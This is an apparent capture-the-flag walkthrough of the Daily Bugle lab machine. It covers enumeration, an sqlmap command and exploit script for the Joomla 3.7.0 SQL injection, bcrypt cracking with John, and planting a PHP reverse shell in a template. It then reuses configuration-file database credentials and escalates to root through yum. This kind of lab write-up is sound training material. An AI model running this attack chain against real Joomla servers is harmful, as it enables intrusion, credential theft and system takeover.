Daily Bugle WalkThrough

Daily Bugle is a CTF Machine that is kinda hard and involves many methods in order to solve the challenge, so let’s start by accessing it from here

As always, let’s start with Nmap to enumerate Daily Bugle Machine and see which services are available on our target.

nmap -sV -sC Machine_IP

After the scan finishes, you should get something similar to the following

Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 08:55 EDT
Nmap scan report for
Host is up (0.27s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.63 seconds

From the results we can know the following:

  • SSH service running with asymmetric key authentication
  • HTTP service is running, so we can access it from the browser
  • we have Robots.txt file along with multiple directories discovered
  • and finally the CMS used in joomla

let’s start by opening the browser to the server, and from the home page, we can get the answer of the first question

Daily Bugle Website

Access the web server, who robbed the bank?


there’s nothing more on the home page, so let’s check the source code , there’s nothing important there too.

Let’s check the robots.txt file, there’s nothing there other than the admin login page.

before we start doing brute forcing, the next question is about joonla version, which you can get by installing a tool called JoomScan that helps to enumerate the joomla CMS.

first you need to install it with

sudo apt-get install JoomScan

and then we run the tool with the following command

joomscan -u http://Machine_IP

from the results of the scan, we will get the next answer.

What is the Joomla version?


until the tool finishes scanning (nothing important will show that we don’t know about yet), let’s search in exploit-db if there is any known vulnerability that we can exploit to get inside the CMS.

searchsploit joomla 3.7.0

and what do you know, we have two vulnerabilities, one of them is SQL injection


Let’s open the link above, we can see that the CMS is vulnerable by using a simple SQLmap command to the home page,you can use this command but it will take so much time.

sqlmap -u "http://Machine_IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

There’s a hint that we should use a python script, so i searched online for Joomla 3.7.0 SQL injection written in python and i found the following script on github.

so let’s get the script


and then let’s run it against our target, you should get something similar to this

 [-] Fetching CSRF token
 [-] Testing SQLi
('  -  Found table:', 'fb9j5_users')
('  -  Extracting users from', 'fb9j5_users')
(' [$] Found user', ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', ''])
('  -  Extracting sessions from', 'fb9j5_session')

so we have a user along with a password, let’s try to crack the password (Bcrypt hash) with John The Ripper.

john --format=bcrypt  --wordlist=/usr/share/wordlists/rockyou.txt password_joomla 

and we would get the next answer

What is Jonah’s cracked password?


now let’s login to joomla CMS

after we login, we need to upload a reverse shell so we can control the Daily Bugle Machine and get the flag.

we know that Joomla runs on PHP, so we need a PHP reverse Shell , but when you upload it, joomla won’t allow you, so first we need to allow PHP file upload.

You can allow that by going to Content->Media->options and you should see “Legal Extension” Field, you can also disable “restrict uploads” just in case

Daily Bugle Joomla

But, it didn’t work, you can try to add “php” to “Legal image extensions” , “Legal MIME Types” but it didn’t work.

Another way is to copy the code inside the template that runs PHP, so if you go to Extensions->Templates->Templates you should get the following

Daily Bugle Joomla Template

if you enlarge the images, you can see that the second one is the one being used, so if we replace the index.php file (the one accessed by default for the home page) then refreshed the page, you should get the reverse shell.

after we get access, let’s head to the home folder

cd home

we can see that there’s a user called jjameson, but we don’t have permission to access it, so it’s time for privilege escalation.

If we checked with which “sudo” permissions we have by using

sudo -l

you can see that we have none, so as always, let’s check for the second place which is the crontab.

There’s nothing there, and we don’t have permission to edit the crontab neither

-rw-r--r--. 1 root root 451 Jun  9  2014 /etc/crontab

Since there’s nothing, let’s check the web server files, maybe we have something in configurations

cd /var/www/html

and let’s check what files we have


let’s check the configuration file.

You should get something similar to this

	public $display_offline_message = '1';
	public $offline_image = '';
	public $sitename = 'The Daily Bugle';
	public $editor = 'tinymce';
	public $captcha = '0';
	public $list_limit = '20';
	public $access = '1';
	public $debug = '0';
	public $debug_lang = '0';
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'root';
	public $password = 'nv5uz9r3ZEDzVjNu';
	public $db = 'joomla';
	public $dbprefix = 'fb9j5_';
	public $live_site = '';
	public $secret = 'UAMBRWzHO3oFPmVC';
	public $gzip = '0';
	public $error_reporting = 'default';

so we have a password that might work, i tried the password on mysql and root users but it didn’t work, then i tried it on jjameson and voila !

su jjameson

and we can get our flag from here by going to the user home files

What is the user flag?


now, it’s time to get root privileges, let’s see which sudo commands we can run, by running sudo -l


so let’s see if we can escalate our privileges with this command by checking gtfobins

in order to escalate our privileges with Yum, we have two methods, either create a package and install it, or method b by doing a custom plugin.

I’ll go with method B, after it works fine, you will have root user, you can check by running whoami

What is the root flag?


and finally, we finished Daily Bugle machine.